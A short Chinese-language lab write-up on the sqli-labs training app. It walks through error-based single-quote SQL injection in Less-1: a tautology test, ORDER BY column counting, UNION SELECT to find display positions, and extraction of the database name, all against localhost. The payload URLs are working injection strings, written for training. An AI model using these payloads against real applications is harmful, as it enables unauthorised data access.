sqli labs注入记录(Less-1至Less-10)
Less-1:基于错误的GET单引号字符型注入 我们首先注入一个单引号’,出现SQL语法错误,多出一个单引号,后面闭合语句也是用的单引号: http://127.0.0.1/sqli_labs/Less-1/?id=1’ 再次注入一条SQL语句,因为条件永远为真,响应正常: http://127.0.0.1/sqli_labs/Less-1/?id=1' and '1'='1 下面猜解字段数: http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1--+ http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1,2,3--+ http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1,2,3,4--+ 此时报错,说明字段数是 3。 确定显位数字: http://127.0.0.1/sqli_labs/Less-1/?id=-1' union select 1,2,3--+ 从上图可以看到,第2和第3个字段均可回显。 进一步地,获取当前数据库名称: http://127.0.0.1/sqli_labs/Less-1/?id=-1' union select 1,(select database()) ,3--+ 数据库名为security。